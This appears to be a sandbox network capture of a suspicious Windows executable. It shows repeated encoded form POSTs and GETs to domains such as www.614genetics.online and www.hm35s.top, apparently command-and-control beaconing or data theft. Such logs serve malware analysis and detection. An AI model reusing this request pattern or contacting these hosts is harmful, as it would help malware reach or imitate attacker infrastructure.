                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50036 | 172.104.82.74 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:40:10.720089912 CET | 842 | OUT | POST /plyd/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.funnystory.online
                                                                                                                            Referer: http://www.funnystory.online/plyd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=Qxv5Wqat9pGaR/6QH6laib+ueAJ1zeoEBzgSz3p1eSCbcl7cX4+KDT3QPx91T3G4+/JDjHVcJ3OSkhveyIyqO9FkyMO9+nNWgcd1FgeQ5PxiGoehMKeQUBP+BsYH6xaNhvyDRyYS0/5mUyWg9f24CXXLrQb1tijZoxNuqR1qvwqFKJs0v6b0haJ8i7mu09rRL/9oIvkTJMEFOjR1za5ppx76eBAUQlC8kg==
Dec 3, 2024 14:40:12.133110046 CET | 464 | IN | HTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:11 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi
                                                                                                                            Content-Length: 238
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50037 | 172.104.82.74 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:40:13.438276052 CET | 1855 | OUT | POST /plyd/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.funnystory.online
                                                                                                                            Referer: http://www.funnystory.online/plyd/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: u6nP_F48= [TRUNCATED]
Dec 3, 2024 14:40:14.963255882 CET | 464 | IN | HTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:14 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi
                                                                                                                            Content-Length: 238
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50038 | 172.104.82.74 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:40:16.107203960 CET | 557 | OUT | GET /plyd/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.funnystory.online
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:40:17.522635937 CET | 802 | IN | HTTP/1.1 302 Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:17 GMT
                                                                                                                            Server: Apache
                                                                                                                            Location: http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE=
                                                                                                                            Content-Length: 409
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.funnystory.online/cgi-sys/suspendedpage.cgi?F8S0G=ul80rPhxFlR8lH&amp;u6nP_F48=dzHZVdeA6r6aBY+WJKlD1JvNcS8At/hTBiY50HAPZV2ofm/GZqXRfQPKYRVLRkTR3sVHjl53Bmiktifh36yAEsVj1orjw3l3xM5ELiir5eYKE6CYAoGwQn3hI9wO6DC6wMKZTnE=">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50039 | 208.91.197.27 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:40:23.324469090 CET | 821 | OUT | POST /n3sn/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.614genetics.online
                                                                                                                            Referer: http://www.614genetics.online/n3sn/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=cdi3YTZiwnrIQ2N4dboHC5ejAptKz8kpuu8w8+jcJguyGvZsYQfPNp7+gvOXx6V1V59nWCc+er1W3VCowAVA7AYb9bB8XGUKwNBvBrZXRHmd2ZN/d0qjrYTaDvH9TdWY9EzSGzsKTD8v9V1oGIZ6a4pCeHxmbeIpboob5eSqE6fKGh3rcIqoyfR236qXoYQfKSNcIpxNaNx3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.6 | 50040 | 208.91.197.27 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:40:25.984782934 CET | 845 | OUT | POST /n3sn/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.614genetics.online
                                                                                                                            Referer: http://www.614genetics.online/n3sn/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=cdi3YTZiwnrIQW94OoQHVpeiMJtK6cktuuww88ORJSKyGKdsZULPBJ7+rPOS8aU3V5gaWAY+evdW3VSowS9D0wYZx7B6K2UKwNBvBrc6RH+d1pd/fVqgoYTZUfH9ZNWU9EyHG21nTHMv9X9oGZZ1T4pEDXwjb8d1RpZp2tW2fqbXO3qxA7qLgPx034ylo4Q1IS1ca+9qV5UU+jDlVqhjeZ8Ff0Fk38R8QQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.6 | 50041 | 208.91.197.27 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:40:28.655308962 CET | 1858 | OUT | POST /n3sn/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.614genetics.online
                                                                                                                            Referer: http://www.614genetics.online/n3sn/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


Session ID: 28 | Source IP: 192.168.2.6 | Source Port: 50042 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5868 | Process: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp: Dec 3, 2024 14:40:31.318845987 CET | Bytes transferred: 558 | Direction: OUT | Data:
GET /n3sn/?u6nP_F48=RfKXbkttwVfKfWhPTrA3UJfHAa0lqotu1/Ih4u/jCz+IVopDYjbPUryKgNOP1Jh4fKEyHC4SaeJpkkGXoxNgwDh8y8hzLkYWybtZWLt0K3r82a9qd0enmdThBea8SuX4gW/lNzc=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.614genetics.online
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 3, 2024 14:40:33.049078941 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:32 GMT
                                                                                                                            Server: Apache
                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                            Set-Cookie: vsid=903vr48077883247977615; expires=Sun, 02-Dec-2029 13:40:32 GMT; Max-Age=157680000; path=/; domain=www.614genetics.online; HttpOnly
                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_kpEFkNp23E74GV2krikBfica5Qn2/WZkmn15IoDU7N69hPp2dt5Vpn09YJQiZy+VimEp8sfCCsOHsa/HN5pDbg==
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: ba10<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net


Session ID: 29 | Source IP: 192.168.2.6 | Source Port: 50043 | Destination IP: 154.23.184.95 | Destination Port: 80 | PID: 5868 | Process: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp: Dec 3, 2024 14:40:39.150326014 CET | Bytes transferred: 794 | Direction: OUT | Data:
POST /tb3j/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.hm35s.top
                                                                                                                            Referer: http://www.hm35s.top/tb3j/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=HQvlGSgXBW3vX7N18qTqU0MXTi/LxwFNPJs4zJROPOylHiBMYvEkUhPKrOXlvPTtQyKhXX9Y0vQWr2cGVHFskG6lVpw1t+suajuUAq5ddoL8Lz5h1rJ68eYgRMDTVXqa+AvPTk38wop3mLVJ3IvSCiQvDb1Qr35EdgGhg1JhaD5DQH+oEyeviiEyt3pXpv7yeQo0V7kefm1i


Session ID: 30 | Source IP: 192.168.2.6 | Source Port: 50044 | Destination IP: 154.23.184.95 | Destination Port: 80 | PID: 5868 | Process: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp: Dec 3, 2024 14:40:41.813071012 CET | Bytes transferred: 818 | Direction: OUT | Data:
POST /tb3j/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.hm35s.top
                                                                                                                            Referer: http://www.hm35s.top/tb3j/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=HQvlGSgXBW3vWfJ19JLqRUMUfC/LjwF3PJo4zL8VO7qlECRMZrYkThPKzeXsivSAQyXcXWxY0vEWrzwGV0dvmW6nNZwzgesuajuUAsUIdsn8IH9h1KJ1/eYvSMDTfHqe+AvtTmCXwqR3mKlJ3c7NVSRqeL1AvFYBSTDCg0x+FjxScRjyYBeMwykwt1xlpP7YcQQ0Hso5QSQBJxKdWxGnPjvbDXdJLwgm0w==
Timestamp: Dec 3, 2024 14:40:43.420348883 CET | Bytes transferred: 312 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:43 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a5f968-94"
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 31 | Source IP: 192.168.2.6 | Source Port: 50045 | Destination IP: 154.23.184.95 | Destination Port: 80 | PID: 5868 | Process: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp: Dec 3, 2024 14:40:44.484373093 CET | Bytes transferred: 1831 | Direction: OUT | Data:
POST /tb3j/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.hm35s.top
                                                                                                                            Referer: http://www.hm35s.top/tb3j/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Timestamp: Dec 3, 2024 14:40:46.073420048 CET | Bytes transferred: 312 | Direction: IN | Data:
HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:45 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a5f968-94"
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            32 | 192.168.2.6 | 50046 | 154.23.184.95 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 3, 2024 14:40:47.154345989 CET | 549 | OUT | GET /tb3j/?F8S0G=ul80rPhxFlR8lH&u6nP_F48=KSHFFnYTGWj/ZMhm+avBOUk2TTzM3y8YS8Rf4LhuEMPHAxZPTsF4EjHc/8b3mL3nQQOBHU115ds5/08vb05btA7AesMNksIJY0axPJ9FedzLP3Na7bRMzIAWWfH5e2OB5R7SOhY= HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.hm35s.top
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:40:48.765579939 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:48 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66a5f968-94"
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            33 | 192.168.2.6 | 50047 | 172.104.18.233 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 3, 2024 14:40:54.605845928 CET | 818 | OUT | POST /7hhj/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.gravendeel.studio
                                                                                                                            Referer: http://www.gravendeel.studio/7hhj/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=Q2qEsfTT27nBCKBnIfzSYa9JVVcqNbavN+v+AZ08jWxJrMBHbMZqOVOlkeaEunMvbHdDconbaHiTCSBK0rCFeOsH4ihWbxPl537D4tNrLVo8zokW1D9Gf2+XpNgwzyeCr+BSafzNrECqj3mD2scp/RFfdebtdQIaZzjBtpRP8KCa2kwDNej/yjECrJXaXGmcnV7u/TLHF4te
                                                                                                                            Dec 3, 2024 14:40:55.729502916 CET | 416 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:55 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: br


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            34 | 192.168.2.6 | 50048 | 172.104.18.233 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 3, 2024 14:40:57.284466982 CET | 842 | OUT | POST /7hhj/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.gravendeel.studio
                                                                                                                            Referer: http://www.gravendeel.studio/7hhj/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=Q2qEsfTT27nBEvRnbsrSf69Oe1cqD7ajN+r+AYgsjEVJrsxHYOxqJVOlr+bAgHMgbHB9cprbaH2TCSxK082CYOsFwChIWRPl537D4tJFLUA8yYUW1glFSW+U+9gwlCfqr+A3aabnrCGqj2WD29co1RFdCub6RgBid1ySsbBvtYqX+ytZRtjcgzkArLPoXmm2lVDutEHgKMI9aHvnycOAGrHNeDxDaFS7tQ==
                                                                                                                            Dec 3, 2024 14:40:58.365456104 CET | 416 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:40:58 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: br


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            35 | 192.168.2.6 | 50049 | 172.104.18.233 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 3, 2024 14:41:00.045715094 CET | 1855 | OUT | POST /7hhj/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.gravendeel.studio
                                                                                                                            Referer: http://www.gravendeel.studio/7hhj/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48= [TRUNCATED]
                                                                                                                            Dec 3, 2024 14:41:01.169348955 CET | 416 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 03 Dec 2024 13:41:01 GMT
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: br


                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                            36 | 192.168.2.6 | 50050 | 172.104.18.233 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                            Dec 3, 2024 14:41:02.758177042 CET | 557 | OUT | GET /7hhj/?u6nP_F48=d0CkvoX3wOjxIpsVGuv5CbpRWXdSS5jyTLOcAowQzGd7pP90T+NzeFPfjsupmGVcOHZBRLveV16iOhBmsp+LB4tn4np0Uy/CwiS3uOlrNEAyxbwQ0Bx5UgKfq4kfjh/tx9U3UfI=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.gravendeel.studio
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Dec 3, 2024 14:41:03.844734907 CET | 501 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
